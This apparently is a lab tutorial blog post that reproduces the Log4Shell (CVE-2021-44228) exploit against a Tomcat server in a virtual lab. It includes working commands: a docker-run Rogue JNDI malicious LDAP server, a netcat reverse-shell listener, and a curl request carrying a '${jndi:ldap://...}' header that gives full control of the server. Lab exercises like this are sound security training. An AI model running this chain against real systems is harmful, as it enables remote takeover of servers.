/ LOG4JSHELL

CVE-2021-44228: Exploiting Log4j Vulnerabilities using Rogue JNDI

In this blog post, we will share the steps that you can follow to simulate the use of CVE-2021-44228 to exploit Log4j vulnerabilities using Rogue JNDI (Malicious LDAP Server). We will follow the steps provided within the log4jshell-lab GitHub repository by Roberto Rodriguez

Pre-Requisites

For the purpose of this blog, we will assume that you have already deployed the required virtual machines using VirtualBox. You can review our previous blog posts to set up the virtual environment.

Tomcat Server Running Vulnerable Java Applications

We have deployed our Tomcat Server using an Ubuntu server 20.04.3 LTS virtual machine. This server is running different Java applications that are vulnerable to an attacker using the Log4j CVE-2021-44228 remote code exeution vulnerability.

Let’s check the status of the tomcat service using the following commad:

service tomcat status

Setting Up the Rogue JNDI Server

Rogue JNDI is a malicious LDAP server that provides a malicious Java class in response to the LDAP request from our tomcat server running a vulnerable version of Log4j. The Java class may contain, for example, malicious code that can start a reverse shell connection from our tomcat server. We will deploy a Rogue JNDI server in our attacker machine.

Using the cd command, change your current directory to log4jshell-lab/attacker/rogue-jndi/

Using the docker build command, build the docker image for the Rogue JNDI server

sudo su

cd log4jshell-lab/attacker/rogue-jndi/

docker build . -t rogue-jndi

Using the docker run command, start the Rogue JNDI server. Note that we are also defining the attacker IP address for the payload (192.168.50.4) and the ports that will be used by our server (1389 and 8888).

docker run --rm -ti -e PAYLOAD_IP=192.168.50.4 -p 1389:1389 -p 8888:8888 rogue-jndi

After starting the Rogue JNDI server, using a new terminal window in the same attacker machine, we will use the nc command to start a netcat listener to process the reverse shell connection.

sudo su

nc -lvnp 443

AWESOME!! We have deployed our Rogue JNDI LDAP server and our netcat listener. You should have two terminal windows like the ones showed in the image below.

Exploiting Log4j vulnerabilities

When we were checking the availability of the Java applications in our Tomcat server, we needed to complete 2 steps:

  • Stablish a SSH connection to our Tomcat server using the user, IP address and password for our server.

  • Perform a GET request using the API for each application.

However, since the attacker does not have the credentials for our Tomcat server, it cannot stablish a SSH connection. If we perform the GET request using the API for our application to the Tomcat server, we can see that the appication is available, but we do not have control over the Tomcat server. Note that we are using the IP address for our Tomcat server and not the local IP 127.0.0.1 .

curl -X GET 192.168.50.5:8080/Log4j-2.14.0-SNAPSHOT/api

We will now add a header to our GET request. The header of our request will contain a LDAP request that points to our Rogue JNDI server (192.168.50.4:1389)

curl -X GET -H 'user-agent: ${jndi:ldap://192.168.50.4:1389/o=tomcat}' 192.168.50.5:8080/Log4j-2.14.0-SNAPSHOT/api

As you can see in the image above, after executing our GET request (With Header), we got a reverse shell connection from the Tomcat server to our attacker machine. We now have full control of the server!!

References